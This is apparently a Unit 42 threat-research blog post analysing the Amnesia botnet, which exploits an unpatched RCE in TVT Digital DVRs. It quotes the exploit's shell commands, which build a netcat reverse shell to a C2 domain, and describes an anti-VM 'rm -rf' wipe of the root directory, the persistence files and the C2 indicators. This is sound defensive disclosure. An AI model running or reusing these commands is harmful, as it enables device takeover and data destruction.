New IoT/Linux Malware Targets DVRs, Forms Botnet

By and

Category: Malware, Unit 42

Tags: , , , , ,

This post is also available in: 日本語 (Japanese)

Unit 42 researchers have identified a new variant of the IoT/Linux botnet “Tsunami”, which we are calling “Amnesia”. The Amnesia botnet targets an unpatched remote code execution vulnerability that was publicly disclosed over a year ago in March 2016 in DVR (digital video recorder) devices made by TVT Digital and branded by over 70 vendors worldwide (a listing of which can be found on the original vulnerability report we've linked to). Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.


Figure 1  Distribution of Vulnerable TVT Digital's DVR devices

In addition, we believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to defeat malware analysis sandboxes. Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system. This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.

Amnesia exploits this remote code execution vulnerability by scanning for, locating, and attacking vulnerable systems. A successful attack results in Amnesia gaining full control of the device.  Attackers could potentially harness the Amnesia botnet to launch broad DDoS attacks similar to the Mirai botnet attacks we saw in Fall 2016.

Even though this vulnerability was disclosed over a year ago, despite our best efforts, we have been unable to find updates that fix this vulnerability.

While the Amnesia botnet hasn’t yet been used to mount large scale attacks, the Mirai botnet attacks show the potential harm large-scale IoT-based botnets can cause. Palo Alto Networks recommends all customers ensure they have our latest protections in place. Additionally, everyone should block traffic to Amnesia’s command and control servers (C2s) listed in Indicators of Compromise (IoC) section of this blog should do so.

Technical Details

Vulnerability Details

On March 22, 2016, security researcher Rotem Kerner disclosed the vulnerability to the public. According to his blog, over 70 DVR vendors around the world were affected by the vulnerability. However, all the DVR devices were manufactured by the same company, “TVT Digital”. To date, we have been unable to find any patch released by the vendors or the manufacturer to address the vulnerability.

Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the keyword on and on They reported about 50,000 and about 705,000 IP addresses respectively.

Table 1 shows the top 20 Countries for potentially vulnerable TVT Digital DVR devices:

1. Taiwan 47170
2. United States 44179
3. Israel 23355
4. Turkey 11780
5. India 9796
6. Malaysia 9178
7. Mexico 7868
8. Italy 7439
9. Vietnam 6736
10. United Kingdom 4402
11. Russia 3571
12. Hungary 3529
13. France 3165
14. Bulgaria 3040
15. Romania 2783
16. Colombia 2616
17. Egypt 2541
18. Canada 2491
19. Iran 1965
20. Argentina 1748

Table 1 Top 20 Countries for potentially vulnerable TVT DVR Digital Devices

Propagation and Vulnerability Exploitation

Amnesia communicates with its C2 server using the IRC protocol. Figure 2 shows some commands it was designed to receive, including to launch DDoS attacks by different types of HTTP flooding and UDP flooding.


Figure 2  C2 Commands of Amnesia

In addition to these commands, two more commands were implemented: CCTVSCANNER and CCTVPROCS. These commands are used for scanning and exploiting the RCE vulnerability in TVT Digital DVRs. After receiving the commands, Amnesia will firstly make a simple HTTP request to the IP address included with the command, checking whether the target is a vulnerable DVR device. This is done by searching for a special string “Cross Web Server” in the HTTP response content as shown in Figure 3 since the TVT Digital’s DVRs used this string as server name in HTTP header.


Figure 3  Check whether the target is a vulnerable DVR

If a vulnerable DVR is found, Amnesia will send four more HTTP requests which contains exploit payloads of four different shell commands. The commands are:

  • echo "nc" > f
  • echo "{one_of_c2_domains}" >> f
  • echo "8888 –e $SHELL" >> f
  • $(cat f) & > r

These commands create a shell script file and execute it. The script content connects with one of Amnesia C2 servers and to expose system default shell. Therefore, the infected devices will be compromised and will listen further shell commands sent from C2 servers as shown in Figure 4


Figure 4  Exploit the RCE vulnerability


When an Amnesia sample executes, it will immediately check whether it’s running in a virtual machine by reading files /sys/class/dmi/id/product_name and /sys/class/dmi/id/sys_vendor and comparing the file contents with keywords “VirtualBox”, “VMware” and “QEMU” as shown in Figure 5. These two files are used by Linux DMI (Desktop Management Interface) to store hardware’s product and manufacturer information. These strings being included in the DMI files implies that the Linux system is running in a virtual machine based on VirtualBox, VMware or QEMU, respectively.


Figure 5  Inspects DMI files to detect VM

If a virtual machine was detected, Amnesia will delete itself, and then try to delete all of the following directories:

  1. the Linux root directory “/”,
  2. the current user’s home directory “~/”, and
  3. the current working directory “./”

These delete operations are basically equivalent to wiping the whole Linux system. They were implemented by simply executing shell command “rm -rf” as shown in Figure 6. For each directory, “rm” command will be executed twice – one in the background, and one in the foreground. Hence, the deleting of the three directories will be parallel. Finally, Amnesia will wait for the delete to finish.


Figure 6  Wipe the Linux system

We believe the author of Amnesia was aiming to defeat Linux-based malware analysis sandboxes and to cause trouble for security researchers due to a hard-coded but otherwise useless string in the code: “fxxkwhitehats”. However, VM based sandboxes typically have system snapshot enabled, allowing for quick recovery to the original state (the sample’s analysis task may be ruined though). The impact will be limited in these cases. The real problem is, if the malware infected some QEMU based Linux server instances, such as virtual hosts provided by VPS vendors, the Linux server will also be wiped, which could be catastrophic if back-ups are not available.

After the VM check, Amnesia creates persistence files in /etc/init.d/.rebootime and /etc/cron.daily/.reboottime, or in ~/.bashrc and ~/.bash_history, depending on the current user’s privileges. It then kills all Telnet and SSH related processes, and connects with a C2 server to receive further commands.

Amnesia hard-coded three domain names such as “” as decoy C2 server addresses. However, the real C2 configuration is decrypted during runtime by simple Caesar cipher algorithm. It chooses one of these three servers:

  • ukranianhorseriding[.]net
  • inversefierceapplied[.]pw

All three of these domains have resolved to the same IP address 93.174.95[.]38 since December 1st, 2016. Before that, the IP address was also used to host other IoT/Linux malware such as DropPerl.


Besides the threat that the Amnesia botnet presents, the malware reveals some interesting and notable trends of current IoT/Linux botnet threats:

  • IoT/Linux malware has begun to adopt classic techniques to evade and even wipe virtual machines.
  • IoT/Linux malware targets and attacks known remote code execution vulnerabilities in IoT devices. These are typically manufactured by smaller manufacturers and there may be no patch available.
  • IoT/Linux malware may also affect Linux servers deployed in VPS or in public cloud.

In the case of Amnesia, because the malware relies on hard coded C2 addresses, preventing another Mirai-type attack is possible if these addresses are blocked as broadly as possible as quickly as possible.

Update: After publishing this report, we learned of other researchers’ past work on various aspects of this malware.

As we mentioned in the introduction, the Tsunami bot has a long history, and this latest version incorporated new features, including a scanner to identify and exploit DVRs for CCTV systems as well as Anti-VM detection capabilities. The CCTV scanning and exploitation technique was previously discussed in these two reports.

Researcher Michal Malik also noted this malware had VM detection capabilities in a Tweet in January:


Palo Alto Networks has blocked the Domains used by this malware for command and control through PAN-DB and Threat Prevention.

Indicators of Compromise

C2 Domains and IP addresses

  • ukranianhorseriding[.]net
  • inversefierceapplied[.]pw
  • 93.174.95[.]38

Amnesia Sample SHA-256









































Ignite ’17 Security Conference: Vancouver, BC June 12–15, 2017

Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry. Visit the Ignite website for more information on tracks, workshops and marquee sessions.